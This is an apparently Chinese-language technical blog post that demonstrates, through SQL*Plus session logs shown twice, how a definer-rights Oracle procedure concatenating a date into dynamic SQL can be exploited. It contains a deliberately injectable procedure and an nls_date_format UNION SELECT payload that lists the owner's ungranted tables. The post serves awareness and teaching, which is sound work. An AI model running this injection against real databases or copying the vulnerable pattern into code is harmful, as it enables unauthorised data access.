oracle 輕鬆小sql注入
今天看tom的有提到一個很有趣的東東,只授權的procedure execute,別人就可以sql注入,以後你可得小心了,下面請看我的試驗
[oracle@aix ~]$ sqlplus anbob/anbob
SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE 10.2.0.4.0 Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production
SQL> select * from all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- -------------------
ZYY 1099 2011-08-30 11:41:03
GZPX_DB 1070 2011-08-30 11:41:01
GIAF 1069 2011-08-30 11:41:01
DEAN_TRAIN 1068 2011-08-30 11:41:01
...
75 rows selected.
SQL> select * from tab;
TNAME TABTYPE CLUSTERID
------------------------------ ------- ----------
TEST TABLE
TESTA TABLE
TESTB TABLE
TESTBLOB TABLE
TESTC TABLE
TESTIMG TABLE
TESTKDR TABLE
TESTXY TABLE
8 rows selected.
SQL> create or replace procedure badboy( p_date in date )
2 as
3 l_rec all_users%rowtype;
4 c sys_refcursor;
5 l_query long;
6 begin
7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';
8 dbms_output.put_line( l_query );
9 open c for l_query;
10 for i in 1 .. 10
11 loop
12 fetch c into l_rec;
13 exit when c%notfound;
14 dbms_output.put_line( l_rec.username || '.....' );
15 end loop;
16 close c;
17 end;
18 /
Procedure created.
SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'
PL/SQL procedure successfully completed.
SQL> grant execute on badboy to icme;
Grant succeeded.
SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
Session altered.
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....
PL/SQL procedure successfully completed.
呵,是不是很眼熟,這當然是anbob的表,這些表並沒有授權給icme。同樣也可以從all_column得到列,那樣就可以得到表只的一部份資料了...
[oracle@aix ~]$ sqlplus anbob/anbob
SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE 10.2.0.4.0 Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production
SQL> select * from all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- -------------------
ZYY 1099 2011-08-30 11:41:03
GZPX_DB 1070 2011-08-30 11:41:01
GIAF 1069 2011-08-30 11:41:01
DEAN_TRAIN 1068 2011-08-30 11:41:01
...
75 rows selected.
SQL> select * from tab;
TNAME TABTYPE CLUSTERID
------------------------------ ------- ----------
TEST TABLE
TESTA TABLE
TESTB TABLE
TESTBLOB TABLE
TESTC TABLE
TESTIMG TABLE
TESTKDR TABLE
TESTXY TABLE
8 rows selected.
SQL> create or replace procedure badboy( p_date in date )
2 as
3 l_rec all_users%rowtype;
4 c sys_refcursor;
5 l_query long;
6 begin
7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';
8 dbms_output.put_line( l_query );
9 open c for l_query;
10 for i in 1 .. 10
11 loop
12 fetch c into l_rec;
13 exit when c%notfound;
14 dbms_output.put_line( l_rec.username || '.....' );
15 end loop;
16 close c;
17 end;
18 /
Procedure created.
SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'
PL/SQL procedure successfully completed.
SQL> grant execute on badboy to icme;
Grant succeeded.
SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
Session altered.
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....
PL/SQL procedure successfully completed.
呵,是不是很眼熟,這當然是anbob的表,這些表並沒有授權給icme。同樣也可以從all_column得到列,那樣就可以得到表只的一部份資料了...
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/23368118/viewspace-706301/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 輕鬆生成小程式分享海報
- 微信小程式 表情小作坊 — 輕鬆定製表情包微信小程式
- SQL輕鬆入門(5):視窗函式SQL函式
- 輕鬆掌握SQL Server錯誤資訊的格式SQLServer
- 軟體工程入門-輕鬆理解依賴注入 (DI) 和 IoC 容器軟體工程依賴注入
- Laravel 中輕鬆容易的輸出 SQL 語句LaravelSQL
- 小團隊招聘 PHP技術員 工作輕鬆PHP
- 帶你輕鬆上手Mac快捷鍵使用小技巧!Mac
- 辦公室革命,教你輕鬆搞定輕鬆玩轉ExcelExcel
- SQL 注入:聯合注入SQL
- sql注入之union注入SQL
- 輕鬆構建基於 Serverless 架構的小程式Server架構
- MIUI 8開發版正式推送!輕鬆掛小號UI
- 一個小程式輕鬆換回一輛寶馬 (轉)
- sql注入SQL
- SQL 注入SQL
- Mac小技巧:利用終端輕鬆製作出下雪效果Mac
- 騰訊雲 wafer2 上手,輕鬆部署小程式後端!後端
- sql注入修改SQL
- sql注入1SQL
- sql注入2SQL
- SQL防注入SQL
- 輕鬆Scrum之旅(下)Scrum
- 輕鬆Scrum之旅(上)Scrum
- Excel輕鬆入門Excel
- 輕鬆接觸Oracle資料庫中的Kill sessionOracle資料庫Session
- 在 laravel 中輕鬆容易的輸出完整的 sql 語句LaravelSQL
- 半小時輕鬆玩轉WebGL濾鏡技術系列(二)Web
- 半小時輕鬆玩轉WebGL濾鏡技術系列(一)Web
- 小魔推推廣新玩法,社團模式輕鬆打造高曝光!模式
- 教你輕鬆搭建連鎖門店小程式_夏日葵電商
- (17)sql注入與sql modeSQL
- SQL Server 之 SQL 注入篇SQLServer
- sql注入之堆疊注入及waf繞過注入SQL
- sql注入之型別及提交注入SQL型別
- 新霸哥帶你輕鬆玩轉Oracle資料庫Oracle資料庫
- 影片建立動畫GIFGIF‘ted for Mac,輕鬆製作各種小動圖動畫Mac
- 經驗分享-20天輕鬆搞定一個6000的小專案